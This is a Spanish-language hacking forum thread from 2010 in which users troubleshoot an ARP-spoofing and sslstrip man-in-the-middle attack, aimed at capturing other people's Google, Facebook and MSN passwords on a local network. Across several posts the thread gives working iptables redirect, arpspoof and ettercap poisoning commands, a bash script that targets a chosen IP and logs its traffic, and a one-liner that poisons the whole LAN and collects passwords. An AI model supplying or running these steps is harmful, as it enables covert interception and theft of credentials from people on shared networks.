Título: Ettercap+Sslstrip Publicado por: Goshin en 9 Marzo 2010, 21:30 pm Buenas posteo para ver si alguien puede echar un poco de luz a mi problema, he leido todos los posts sobre ettercap y sslstrip que hay en el foro he googleado y aun asi no he encontrado la causa de mi problema que a continuacion indico:
Router 192.168.2.1 Router Belkinip Pc del escaneo 192.168.2.10 Estoy intentando capturar las contraseñas de google,facebook,msn.... de mi red con Ettercap y sslstrip lo que hago es: En una Terminal: echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 Segundo terminal: arpspoof -i eth1-t 192.168.2.10 192.168.2.1 Tercer terminal: python sslstrip.py -a Cuarto terminal: ettercap -T -q -i eth1 Lo que me da el ettercap es lo sigiente: DHCP: [00:22:75:8E:XX:XX] REQUEST 192.168.2.10 DHCP: [192.168.2.1] ACK : 192.168.2.10 255.255.255.0 GW 192.168.2.1 DNS 192.168.2.1 "Belkin" Entonces nose si es por el DHCP o por otra cosa he desactivado el firewall del router y sige igual, tambien he provado a usar el ARP Spoof del ettercap y nada.... Espero que alguien pueda ayudarme o darme una pista. mil gracias Título: Re: Ettercap+Sslstrip Publicado por: kamsky en 9 Marzo 2010, 22:35 pm hombre, es que lo de hacerte un MiM a ti mismo... es un poco raro cuanto menos!
prueba a hacerlo en un par de VM Título: Re: Ettercap+Sslstrip Publicado por: Goshin en 9 Marzo 2010, 22:46 pm Mil perdones la ip 192.168.2.10 es otro pc que tengo en la red, lo he provado con otro pc mas y lo mismo(modifico el post original, es que estaba mi novia al lado hablandome y no me fije)
Muchas gracias por responderme Kamsky de verdad Título: Re: Ettercap+Sslstrip Publicado por: kamsky en 9 Marzo 2010, 23:05 pm tienes que hacer el MiM completo, sólo lo estás haciendo en un sentido de la conexión
ya que usas ettercap para capturar tráfico, úsalo también para hacer el Arp Poisoning Título: Re: Ettercap+Sslstrip Publicado por: Goshin en 9 Marzo 2010, 23:13 pm Gracias por responderme si te refieres a :
terminal1 : arpspoof -i eth1-t 192.168.2.10 192.168.2.1 terminal2 : arpspoof -i eth1-t 192.168.2.1 192.168.2.10 ya lo he probado , supongo que te refieres a eso, y no he tenido ningun resultado Título: Re: Ettercap+Sslstrip Publicado por: kamsky en 9 Marzo 2010, 23:21 pm vamos por partes, primero olvídate del sslstrip y consigue que funcione el MiM, hazlo con ettercap
# sudo ettercap -C Sniff -> Unified Sniffing-> tu tarjeta de red Hosts->Scan for Hosts Hosts-> Hosts List -> seleccionas la víctima con el 1, y el router con el 2 Mitm->Arp Poisoning-> remote Start->Start Sniffing una vez hecho esto, navega , manda mails o lo que sea pero en páginas no seguras, te debería de capturar todo... Título: Re: Ettercap+Sslstrip Publicado por: Goshin en 9 Marzo 2010, 23:38 pm Primero de todo gracias por dedicarme tu tiempo y tu ayuda.
lo que me comentas lo he probado y sale el mismo mensaje. En principio captura paquetes y veo conexiones de msn y facebook en View> Connections pero en User messages me sale lo que comente: DHCP: [00:22:75:8E:XX:XX] REQUEST 192.168.2.10 DHCP: [192.168.2.1] ACK : 192.168.2.10 255.255.255.0 GW 192.168.2.1 DNS 192.168.2.1 "Belkin" sinceramente nose que puede ser, de doy otra vez las gracias por ayudarme en este asunto Edito:Los paquetes que veo de msn, facebook se ven al ver los paquetes pero no se pueden leer ni conversacions ni pass ni nada como mucho alguna cuenta de msn tipo xxxx@hotmail.com Título: Re: Ettercap+Sslstrip Publicado por: kamsky en 10 Marzo 2010, 21:38 pm asegurate de que se haya hecho bien el arp poisoning, mira la tabla arp en la víctima a ver si tiene la misma dirección MAC para tu IP y la del router
Título: Re: Ettercap+Sslstrip Publicado por: Goshin en 10 Marzo 2010, 22:54 pm Hm las direccion MAC no cambian , cada uno tiene su direccion mac respectiva O_o en principio mi direccion mac y la del pc a escanear tendrian que ser iguales , no?
Título: Re: Ettercap+Sslstrip Publicado por: kamsky en 10 Marzo 2010, 23:20 pm en la Víctima tienen que corresponder las MACS del router con la tuya, de forma que cuando este Pc mande datos al router, en realidad te los esté mandando a tí, que los retransmites al router verdadero (por esto la necesidad de activar el forwarding), y en el sentido contrario pues lo mismo, si no sucede esto es que no se está haciendo correctamente el arp poisoning
Título: Re: Ettercap+Sslstrip Publicado por: Goshin en 10 Marzo 2010, 23:29 pm Si lo he leido para asegurarme , nose porque no cambia las direcciones MAC hm no tengo ni idea de como solucionarlo.Pongo de paso un enlace donde se explica perfectamente, pero aun asi ami no me funciona el ataque ARP.
http://casidiablo.net/videotutoriales/ettercap.htm?keepThis=true&TB_iframe=true&height=635&width=800 Título: Re: Ettercap+Sslstrip Publicado por: kamsky en 10 Marzo 2010, 23:34 pm pues si es raro si.. no creo que tengas la tabla estática... para asegurarte prueba a cambiarla tu a mano
Título: Re: Ettercap+Sslstrip Publicado por: Goshin en 10 Marzo 2010, 23:39 pm Podria ser cosa del router ? el Firewall lo he desactivado para hacer pruebas pero nuse voy a mirar lo de la tabla.
Bueno te pego las entradas de mi tabla ARP: ? (192.168.2.10) at 00:1d:e0:8f:XX:XX [ether] PERM on wlan0 ----> (esta estaba añadida que como se ve es la del pc que quiero escanear) ? (192.168.2.1) at 00:22:75:7b:XX:XX [ether] on wlan0 --------->(Esta la he añadadido yo y es la del router) Título: Re: Ettercap+Sslstrip Publicado por: Goshin en 11 Marzo 2010, 01:21 am hmm me ha pasado una cosa interesante , he consegido capturar un packete que si me sale en el user messages y es del foro.
HTTP : 66.118.xx.xx:xx -> USER: goshin PASS: INFO: http://foro.elhacker.net/login.html El pass no sale ni en el ettercap, al ver esto me he animado y he empezado a logearme en varios sitios , pero sin ningun resultado la verdad esque me estoy desesperando xDDD Título: Re: Ettercap+Sslstrip Publicado por: kamsky en 11 Marzo 2010, 20:22 pm o te sale o no te sale, no puede ser que te salgan unas cosas y otras no... :-\
es lógico que bastantes cosas no te salgan ya que serán datos de páginas cifradas, de ahí que te dijese que primero hay que cerciorarse que se hace bien el MiM y luego ya le das caña al SslStrip Título: Re: Ettercap+Sslstrip Publicado por: oleviatan en 6 Abril 2010, 00:53 am Ola amigos!!
He estado leyendo este hilo y a mi me ocurre lo mismo que a Goshin. Estoy en la misma situación hago un arp poisoning con un filtro ssh y me sale de vez en cuando en la tabla de mensajes: Código: DHCP: [192.168.1.1] ACK : 0.0.0.0 255.255.255.0 GW 192.168.1.1 DNS 80.58.61.250 Si se ha solucionado podrías decirme como Muchas gracias. Título: Re: Ettercap+Sslstrip Publicado por: l1vv3r en 15 Abril 2010, 16:35 pm Te dejo un script que a mi me funciona a la perfeccion en cuanto a funcionamiento de sslstrip:
#!/bin/bash path_dir=/tmp #La ruta donde quieras guardar los resultados file_name=sslstrip.log file_name2=tcpdump.pcap device=wlan0 #Modifica según el dispositivo desde donde hagas la captura. $direccion_ip=192.168.0.12 #La IP del objetivo $gateway=192.168.0.1 #La IP para realizar el ARP Spoofing echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5555 roxterm --tab -e sslstrip -w $path_dir/$file_name -l 5555 roxterm --tab -e arpspoof -i $device -t $direccion_ip $gateway roxterm --tab -e tcpdump -nni $device -s 0 -w $path_dir/$file_name2 host $direccion_ip Espero que te sea de utilidad Título: Re: Ettercap+Sslstrip Publicado por: PyrOS-9889 en 25 Septiembre 2010, 21:45 pm mejor prueba esto (http://seifreed.com/2010/07/24/desmitificando-la-seguridad-de-https-con-sslstrip/)
pero si lo quieres hacer con ettercap puedes probar esto: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000 ettercap -TqM arp // // -i eth0 sslstrip -w passwords tail -f passwords con esos pasos ahorras hacer 1 al ip_forward y ya no usas arpspoof además envenenas a todos en la LAN xD algo tarde pero pues a lo mejor a alguien le sirve... :p |